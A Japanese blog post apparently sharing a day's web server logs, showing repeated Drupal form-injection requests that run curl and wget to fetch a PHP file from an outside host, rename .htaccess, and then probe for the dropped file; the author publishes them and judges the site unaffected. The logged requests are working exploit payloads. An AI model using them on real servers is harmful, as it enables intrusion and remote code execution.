Webサーバーログ:2019-05-28 の怪しいHTTPDログ

またまた、Webサーバーへ怪しいアクセスが。

[28/May/2019:08:14:01] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-O+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 2472       "-"
[28/May/2019:08:14:06] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 2472       "-"
[28/May/2019:08:14:09] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php%20%7C%20wget%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php HTTP/1.1" 200 2472       "-"
[28/May/2019:08:14:13] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff HTTP/1.1" 200 2472       "-"
[28/May/2019:08:14:16] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 2472       "-"
[28/May/2019:08:15:57] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-O+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 55393       "-"
[28/May/2019:08:16:08] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 55373       "-"
[28/May/2019:08:16:24] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php%20%7C%20wget%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php HTTP/1.1" 200 55425       "-"
[28/May/2019:08:16:35] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff HTTP/1.1" 200 55361       "-"
[28/May/2019:08:16:45] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 55436       "-"
[28/May/2019:08:17:29] - - leopard.clnorfolk.org    "GET /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//style.php HTTP/1.1" 301 -       "-"
[28/May/2019:08:18:04] - - leopard.clnorfolk.org    "GET /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//style.php HTTP/1.1" 301 -       "-"
[28/May/2019:08:19:56] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-O+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 2472       "-"
[28/May/2019:08:20:02] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 2472       "-"
[28/May/2019:08:20:07] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php%20%7C%20wget%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php HTTP/1.1" 200 2472       "-"
[28/May/2019:08:20:05] - - leopard.clnorfolk.org    "GET /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//sites/default/files/ze.php?z9 HTTP/1.1" 301 -       "-"
[28/May/2019:08:20:10] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff HTTP/1.1" 200 2472       "-"
[28/May/2019:08:20:15] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 2472       "-"
[28/May/2019:08:20:39] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-O+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 2472       "-"
[28/May/2019:08:20:44] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 2472       "-"
[28/May/2019:08:20:48] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php%20%7C%20wget%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php HTTP/1.1" 200 2472       "-"
[28/May/2019:08:20:51] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff HTTP/1.1" 200 2472       "-"
[28/May/2019:08:20:55] - - leopard.clnorfolk.org    "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 2472       "-"
[28/May/2019:08:21:39] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-O+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 55393       "-"
[28/May/2019:08:21:48] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 55373       "-"
[28/May/2019:08:21:58] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php%20%7C%20wget%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php HTTP/1.1" 200 55425       "-"
[28/May/2019:08:22:10] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff HTTP/1.1" 200 55361       "-"
[28/May/2019:08:22:20] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 55436       "-"
[28/May/2019:08:22:22] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-O+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 55393       "-"
[28/May/2019:08:22:33] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 55373       "-"
[28/May/2019:08:22:43] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php%20%7C%20wget%20http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.php HTTP/1.1" 200 55425       "-"
[28/May/2019:08:22:49] - - leopard.clnorfolk.org    "GET /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//style.php HTTP/1.1" 301 -       "-"
[28/May/2019:08:22:54] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-o+style.php+http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff HTTP/1.1" 200 55361       "-"
[28/May/2019:08:23:05] - - leopard.clnorfolk.org    "POST /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/style.php+'http://www.notruf122.com/wp-includes/fonts/-ww/cm/style.aff' HTTP/1.1" 200 55436       "-"
[28/May/2019:08:23:20] - - leopard.clnorfolk.org    "GET /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//style.php HTTP/1.1" 301 -       "-"
[28/May/2019:08:23:31] - - leopard.clnorfolk.org    "GET /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//style.php HTTP/1.1" 301 -       "-"
[28/May/2019:08:24:05] - - leopard.clnorfolk.org    "GET /notes/2017/02/28/attack-to-my-web-server-wordpress-from-a-rental-server//style.php HTTP/1.1" 301 -       "-"

公開します。

「//?q=」でPOSTしているので、そこに受けスクリプトがなく無視されて私のサイトには影響ないはずではありますが、リターンコードが 200 になっているのは気分悪い。

curl と style.php がターゲットになっているように見えます。

コメントを残す